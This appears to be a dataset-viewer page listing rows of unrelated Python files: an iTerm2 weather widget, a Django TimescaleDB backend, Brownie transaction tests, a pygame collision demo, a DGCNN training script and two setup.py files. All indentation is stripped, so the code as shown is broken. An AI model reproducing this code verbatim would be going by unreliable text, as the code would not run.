"""returns the option's value if the option is in the knob, otherwise returns False"""
return knobs[option.name] if option.name in knobs else default_value
@iterm2.StatusBarRPC
async def weather_info(knobs):
w.CITYNAME = knob_value(knobs, knob_city, 'Shibuya')
w.UNITS = 'imperial' if knob_value(knobs, knob_use_imperial, False) else 'metric'
use_icon = bool(knob_value(knobs, knob_use_icon, True))
show_forecast = bool(knob_value(knobs, knob_show_forecast, True))
## for debug
# print(f'knobs: {knobs}')
# print(f'have log file: {have_log()}, is refresh time: {is_refresh_time()}')
if have_log():
log_data = read_log()
opt_req = is_opt_modify(knobs)
is_same_opt = w.CITYNAME == log_data['city'] and w.UNITS == log_data['units'] and \
use_icon == log_data['use_icon'] and show_forecast == log_data['show_forecast']
# print(f'is knob option request: {opt_req}, is same knob options: {is_same_opt}')
if not opt_req or (is_same_opt and not is_refresh_time()):
# print(f'[application info] Use stored weather info: '
# f'city={w.CITYNAME}, units={w.UNITS}, use_icon={use_icon}, show_forecast={show_forecast}')
return log_data['weather_info']
print(f'[application info] Fetching weather: {knobs}')
w.fetch_weather()
w.parse_weather()
weather_info = w.iterm_format(use_icon=use_icon, show_forecast=show_forecast)
write_log(w.CITYNAME, use_icon, w.UNITS, show_forecast, weather_info)
return weather_info
await component.async_register(connection, weather_info)
CONFIG = json.load((Path(__file__).parent / 'config.json').open())
APIKEY = CONFIG['OpenWeatherAPIKey']
LOGFILE_PATH = Path('/tmp/iterm-weatherinfo.log')
w = WeatherInfo()
w.APIKEY = APIKEY
iterm2.run_forever(main)
|
69803
|
import logging
from django.db import ProgrammingError
from django.core.exceptions import ImproperlyConfigured
from timescale.db.backends.postgis import base_impl
from timescale.db.backends.postgis.schema import TimescaleSchemaEditor
logger = logging.getLogger(__name__)
class DatabaseWrapper(base_impl.backend()):
SchemaEditorClass = TimescaleSchemaEditor
def prepare_database(self):
"""Prepare the configured database.
This is where we enable the `timescaledb` extension
if it isn't enabled yet."""
super().prepare_database()
with self.cursor() as cursor:
try:
cursor.execute('CREATE EXTENSION IF NOT EXISTS timescaledb')
except ProgrammingError: # permission denied
logger.warning(
'Failed to create "timescaledb" extension. '
'Usage of timescale capabilities might fail'
'If timescale is needed, make sure you are connected '
'to the database as a superuser '
'or add the extension manually.',
exc_info=True
)
|
69826
|
from js_reimpl_common import run_op_chapter1_chapter2
def run_op(keys, op, **kwargs):
return run_op_chapter1_chapter2("chapter1", None, keys, op, **kwargs)
def create_new(numbers):
return run_op(None, "create_new", array=numbers)
def create_new_broken(numbers):
return run_op(None, "create_new_broken", array=numbers)
def has_key(keys, key):
return run_op(keys, "has_key", key=key)
def linear_search(numbers, key):
return run_op(None, "linear_search", key=key, array=numbers)
|
69837
|
import threading
import time
import pytest
import brownie
def send_and_wait_for_tx():
tx = brownie.accounts[0].transfer(
brownie.accounts[1], "0.1 ether", required_confs=0, silent=True
)
tx.wait(2)
assert tx.confirmations >= 2
assert tx.status == 1
@pytest.fixture
def block_time_network(devnetwork, config, network_name):
"""Provide a network with fixed block mining time of 1 second."""
config.networks[network_name]["cmd_settings"]["block_time"] = 1
devnetwork.disconnect()
devnetwork.connect(network_name)
yield devnetwork
devnetwork.disconnect()
def test_required_confirmations_deploy(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
accounts[0].deploy(BrownieTester, True, required_confs=3)
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transfer(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=3)
assert tx.confirmations >= 3
assert web3.eth.block_number - block >= 3
def test_required_confirmations_transact(accounts, BrownieTester, block_time_network, web3):
block = web3.eth.block_number
brownieTester = BrownieTester.deploy(True, {"from": accounts[0], "required_confs": 2})
assert web3.eth.block_number - block >= 2
block = web3.eth.block_number
tx = brownieTester.doNothing({"from": accounts[0], "required_confs": 4})
assert tx.confirmations >= 4
assert web3.eth.block_number - block >= 4
def test_required_confirmations_zero(accounts, block_time_network, web3):
block = web3.eth.block_number
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=0)
assert tx.status == -1
assert web3.eth.block_number - block == 0
time.sleep(1.5)
assert tx.status == 1
assert tx.confirmations >= 1
def test_wait_for_confirmations(accounts, block_time_network):
tx = accounts[0].transfer(accounts[1], "1 ether", required_confs=1)
tx.wait(3)
assert tx.confirmations in [3, 4]
tx.wait(2)
tx.wait(5)
assert tx.confirmations >= 5
def test_pending_nonce(accounts, block_time_network):
for _ in range(3):
accounts[0].transfer(accounts[1], "0.1 ether", required_confs=0, silent=True)
assert accounts[0]._pending_nonce() == 3
assert accounts[0].nonce < 3
time.sleep(3.5)
assert accounts[0].nonce == 3
def test_multithreading(accounts, history, block_time_network):
threads = []
for _ in range(3):
thread = threading.Thread(target=send_and_wait_for_tx, daemon=True)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
for tx in history:
assert tx.status == 1
assert tx.confirmations >= 2
|
69842
|
import pygame as pg
import sys
from collision import *
SCREENSIZE = (500,500)
screen = pg.display.set_mode(SCREENSIZE, pg.DOUBLEBUF|pg.HWACCEL)
v = Vector
p0 = Concave_Poly(v(0,0), [v(-80,0), v(-20,20), v(0,80), v(20,20), v(80,0), v(20,-20), v(0,-80), v(-20,-20)])
p1 = Concave_Poly(v(500,500), [v(-80,0), v(-20,20), v(0,80), v(20,20), v(80,0), v(20,-20), v(0,-80), v(-20,-20)])
clock = pg.time.Clock()
while 1:
for event in pg.event.get():
if event.type == pg.QUIT:
sys.exit()
screen.fill((0,0,0))
p0.pos.x += 1
p0.pos.y += 0.75
p0.angle += 0.005
p1.pos.x -= 0.6
p1.pos.y -= 0.5
p0c, p1c, p2c = (0,255,255),(0,255,255),(0,255,255)
p0bc = (255,255,255)
p1bc = (255,255,255)
if collide(p0,p1): p1c = (255,0,0); p0c = (255,0,0);
if test_aabb(p0.aabb,p1.aabb): p1bc = (255,0,0); p0bc = (255,0,0);
pg.draw.polygon(screen, p0c, p0.points, 3)
pg.draw.polygon(screen, p1c, p1.points, 3)
pg.draw.polygon(screen, p0bc, (p0.aabb[0],p0.aabb[1],p0.aabb[3],p0.aabb[2]), 3)
pg.draw.polygon(screen, p1bc, (p1.aabb[0],p1.aabb[1],p1.aabb[3],p1.aabb[2]), 3)
pg.display.flip()
clock.tick(100)
|
69849
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os,time,datetime,sys
import numpy as np
import dgcnn
import tensorflow as tf
def round_decimals(val,digits):
factor = float(np.power(10,digits))
return int(val * factor+0.5) / factor
def iteration_from_filename(file_name):
return int((file_name.split('-'))[-1])
def iotest(flags):
# IO configuration
io = dgcnn.io_factory(flags)
io.initialize()
num_entries = io.num_entries()
ctr = 0
while ctr < num_entries:
idx,data,label,weight=io.next()
msg = str(ctr) + '/' + str(num_entries) + ' ... ' + str(idx) + ' ' + str(data[0].shape)
if label:
msg += str(label[0].shape)
if weight:
msg += str(weight[0].shape)
print(msg)
ctr += len(data)
io.finalize()
class Handlers:
sess = None
data_io = None
csv_logger = None
weight_io = None
train_logger = None
iteration = 0
def train(flags):
flags.TRAIN = True
handlers = prepare(flags)
train_loop(flags,handlers)
def inference(flags):
flags.TRAIN = False
handlers = prepare(flags)
inference_loop(flags,handlers)
def prepare(flags):
handlers = Handlers()
# assert
if flags.BATCH_SIZE % (flags.MINIBATCH_SIZE * len(flags.GPUS)):
msg = '--batch_size (%d) must be a modular of --gpus (%d) * --minibatch_size (%d)\n'
msg = msg % (flags.BATCH_SIZE,flags.MINIBATCH_SIZE,len(flags.GPUS))
sys.stderr.write(msg)
sys.exit(1)
# IO configuration
handlers.data_io = dgcnn.io_factory(flags)
handlers.data_io.initialize()
_,train_data,_,_ = handlers.data_io.next()
# Trainer configuration
flags.NUM_CHANNEL = handlers.data_io.num_channels()
handlers.trainer = dgcnn.trainval(flags)
handlers.trainer.initialize()
# Create a session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
handlers.sess = tf.Session(config=config)
init = tf.group(tf.global_variables_initializer(),
tf.local_variables_initializer())
handlers.sess.run(init)
handlers.weight_io = tf.train.Saver(max_to_keep=flags.CHECKPOINT_NUM,
keep_checkpoint_every_n_hours=flags.CHECKPOINT_HOUR)
if flags.WEIGHT_PREFIX:
save_dir = flags.WEIGHT_PREFIX[0:flags.WEIGHT_PREFIX.rfind('/')]
if save_dir and not os.path.isdir(save_dir): os.makedirs(save_dir)
handlers.iteration = 0
loaded_iteration = 0
if flags.MODEL_PATH:
handlers.weight_io.restore(handlers.sess, flags.MODEL_PATH)
loaded_iteration = iteration_from_filename(flags.MODEL_PATH)
if flags.TRAIN: handlers.iteration = loaded_iteration+1
if flags.LOG_DIR:
if not os.path.exists(flags.LOG_DIR): os.mkdir(flags.LOG_DIR)
handlers.train_logger = tf.summary.FileWriter(flags.LOG_DIR)
handlers.train_logger.add_graph(handlers.sess.graph)
logname = '%s/train_log-%07d.csv' % (flags.LOG_DIR,loaded_iteration)
if not flags.TRAIN:
logname = '%s/inference_log-%07d.csv' % (flags.LOG_DIR,loaded_iteration)
handlers.csv_logger = open(logname,'w')
return handlers
def train_loop(flags,handlers):
handlers.csv_logger.write('iter,epoch')
handlers.csv_logger.write(',titer,ttrain,tio,tsave,tsummary')
handlers.csv_logger.write(',tsumiter,tsumtrain,tsumio,tsumsave,tsumsummary')
handlers.csv_logger.write(',loss,accuracy\n')
tsum = 0.
tsum_train = 0.
tsum_io = 0.
tsum_save = 0.
tsum_summary = 0.
while handlers.iteration < flags.ITERATION:
tstamp_iteration = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
tstart_iteration = time.time()
report_step = flags.REPORT_STEP and ((handlers.iteration+1) % flags.REPORT_STEP == 0)
summary_step = flags.SUMMARY_STEP and handlers.train_logger and ((handlers.iteration+1) % flags.SUMMARY_STEP == 0)
checkpt_step = flags.CHECKPOINT_STEP and flags.WEIGHT_PREFIX and ((handlers.iteration+1) % flags.CHECKPOINT_STEP == 0)
tstart = time.time()
idx,data,label,weight = handlers.data_io.next()
tspent_io = time.time() - tstart
tsum_io += tspent_io
current_idx = 0
loss_v = []
accuracy_v = []
handlers.trainer.zero_gradients(handlers.sess)
# Accummulate gradients
tspent_train = 0.
tspent_summary = 0.
while current_idx < flags.BATCH_SIZE:
tstart = time.time()
data_v = []
label_v = []
weight_v = None
if weight is not None: weight_v = []
for _ in flags.GPUS:
start = current_idx
end = current_idx + flags.MINIBATCH_SIZE
data_v.append(data[start:end])
label_v.append(label[start:end])
if weight is not None:
weight_v.append(weight[start:end])
current_idx = end
# compute gradients
make_summary = summary_step and (current_idx == flags.BATCH_SIZE)
res = handlers.trainer.accum_gradient(handlers.sess,data_v,label_v,weight_v,summary=make_summary)
accuracy_v.append(res[1])
loss_v.append(res[2])
tspent_train = tspent_train + (time.time() - tstart)
# log summary
if make_summary:
tstart = time.time()
handlers.train_logger.add_summary(res[3],handlers.iteration)
tspent_summary = time.time() - tstart
# Apply gradients
tstart = time.time()
handlers.trainer.apply_gradient(handlers.sess)
tspent_train = tspent_train + (time.time() - tstart)
tsum_train += tspent_train
tsum_summary += tspent_summary
# Compute loss/accuracy
loss = np.mean(loss_v)
accuracy = np.mean(accuracy_v)
epoch = handlers.iteration * float(flags.BATCH_SIZE) / handlers.data_io.num_entries()
# Save snapshot
tspent_save = 0.
if checkpt_step:
tstart = time.time()
ssf_path = handlers.weight_io.save(handlers.sess,flags.WEIGHT_PREFIX,global_step=handlers.iteration)
tspent_save = time.time() - tstart
print('saved @',ssf_path)
# Report (logger)
if handlers.csv_logger:
tspent_iteration = time.time() - tstart_iteration
tsum += tspent_iteration
csv_data = '%d,%g,' % (handlers.iteration,epoch)
csv_data += '%g,%g,%g,%g,%g,' % (tspent_iteration,tspent_train,tspent_io,tspent_save,tspent_summary)
csv_data += '%g,%g,%g,%g,%g,' % (tsum,tsum_train,tsum_io,tsum_save,tsum_summary)
csv_data += '%g,%g\n' % (loss,accuracy)
handlers.csv_logger.write(csv_data)
# Report (stdout)
if report_step:
loss = round_decimals(loss,4)
accuracy = round_decimals(accuracy,4)
tfrac = round_decimals(tspent_train/tspent_iteration*100.,2)
epoch = round_decimals(epoch,2)
mem = handlers.sess.run(tf.contrib.memory_stats.MaxBytesInUse())
msg = 'Iteration %d (epoch %g) @ %s ... train time fraction %g%% max mem. %g ... loss %g accuracy %g'
msg = msg % (handlers.iteration,epoch,tstamp_iteration,tfrac,mem,loss,accuracy)
print(msg)
sys.stdout.flush()
if handlers.csv_logger: handlers.csv_logger.flush()
if handlers.train_logger: handlers.train_logger.flush()
# Increment iteration counter
handlers.iteration +=1
handlers.train_logger.close()
handlers.csv_logger.close()
handlers.data_io.finalize()
def inference_loop(flags,handlers):
handlers.csv_logger.write('iter,epoch')
handlers.csv_logger.write(',titer,tinference,tio')
handlers.csv_logger.write(',tsumiter,tsuminference,tsumio')
handlers.csv_logger.write(',loss,accuracy\n')
tsum = 0.
tsum_io = 0.
tsum_inference = 0.
while handlers.iteration < flags.ITERATION:
tstamp_iteration = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
tstart_iteration = time.time()
report_step = flags.REPORT_STEP and ((handlers.iteration+1) % flags.REPORT_STEP == 0)
tstart = time.time()
idx,data,label,weight = handlers.data_io.next()
tspent_io = time.time() - tstart
tsum_io += tspent_io
current_idx = 0
softmax_vv = []
loss_v = []
accuracy_v = []
# Run inference
tspent_inference = 0.
tstart = time.time()
while current_idx < flags.BATCH_SIZE:
data_v = []
label_v = None
weight_v = None
if label is not None: label_v = []
if weight is not None: weight_v = []
for _ in flags.GPUS:
start = current_idx
end = current_idx + flags.MINIBATCH_SIZE
data_v.append(data[start:end])
if label is not None:
label_v.append(label[start:end])
if weight is not None:
weight_v.append(weight[start:end])
current_idx = end
# compute gradients
res = handlers.trainer.inference(handlers.sess,data_v,label_v,weight_v)
if flags.LABEL_KEY:
softmax_vv = softmax_vv + res[0:-2]
accuracy_v.append(res[-2])
loss_v.append(res[-1])
else:
softmax_vv = softmax_vv + res
tspent_inference = tspent_inference + (time.time() - tstart)
tsum_inference += tspent_inference
# Store output if requested
if flags.OUTPUT_FILE:
idx_ctr = 0
for softmax_v in softmax_vv:
for softmax in softmax_v:
handlers.data_io.store(idx[idx_ctr],softmax)
idx_ctr += 1
# Compute loss/accuracy
loss,accuracy=[-1,-1]
if flags.LABEL_KEY:
loss = np.mean(loss_v)
accuracy = np.mean(accuracy_v)
epoch = handlers.iteration * float(flags.BATCH_SIZE) / handlers.data_io.num_entries()
# Report (logger)
if handlers.csv_logger:
tspent_iteration = time.time() - tstart_iteration
tsum += tspent_iteration
csv_data = '%d,%g,' % (handlers.iteration,epoch)
csv_data += '%g,%g,%g,' % (tspent_iteration,tspent_inference,tspent_io)
csv_data += '%g,%g,%g,' % (tsum,tsum_inference,tsum_io)
csv_data += '%g,%g\n' % (loss,accuracy)
handlers.csv_logger.write(csv_data)
# Report (stdout)
if report_step:
loss = round_decimals(loss,4)
accuracy = round_decimals(accuracy,4)
tfrac = round_decimals(tspent_inference/tspent_iteration*100.,2)
epoch = round_decimals(epoch,2)
mem = handlers.sess.run(tf.contrib.memory_stats.MaxBytesInUse())
msg = 'Iteration %d (epoch %g) @ %s ... inference time fraction %g%% max mem. %g ... loss %g accuracy %g'
msg = msg % (handlers.iteration,epoch,tstamp_iteration,tfrac,mem,loss,accuracy)
print(msg)
sys.stdout.flush()
if handlers.csv_logger: handlers.csv_logger.flush()
# Increment iteration counter
handlers.iteration +=1
handlers.csv_logger.close()
handlers.data_io.finalize()
|
69852
|
from __future__ import with_statement
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import six
six_classifiers = [
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries',
'Topic :: Utilities',
]
with open('README', 'r') as fp:
six_long_description = fp.read()
setup(name='six',
version=six.__version__,
author='<NAME>',
author_email='<EMAIL>',
url='http://pypi.python.org/pypi/six/',
py_modules=['six'],
description='Python 2 and 3 compatibility utilities',
long_description=six_long_description,
license='MIT',
classifiers=six_classifiers
)
|
69855
|
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
NAME = "energyusage"
VERSION = "0.0.13"
DESCRIPTION = "Measuring the environmental impact of computation"
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = "https://github.com/responsibleproblemsolving/energy-usage"
AUTHOR = "<NAME>, <NAME>, <NAME>"
AUTHOR_EMAIL = "<EMAIL>"
LICENSE = "Apache 2.0"
CLASSIFIERS = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
]
PACKAGES = ['energyusage']
PACKAGE_DATA = {
'energyusage.data.csv' : ['*.csv'],
'energyusage.data.json' : ['*.json']
}
INCLUDE_PACKAGE_DATA = True
PACKAGE_DIR = {
'energyusage.data' : 'data'
}
INSTALL_REQUIRES = [
'requests',
'reportlab'
]
setup(
name= NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type = LONG_DESCRIPTION_CONTENT_TYPE,
url=URL,
author=AUTHOR,
author_email = AUTHOR_EMAIL,
license = LICENSE,
classifiers=CLASSIFIERS,
packages = PACKAGES,
package_data = PACKAGE_DATA,
include_package_data = INCLUDE_PACKAGE_DATA,
package_dir = PACKAGE_DIR,
install_requires=INSTALL_REQUIRES
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.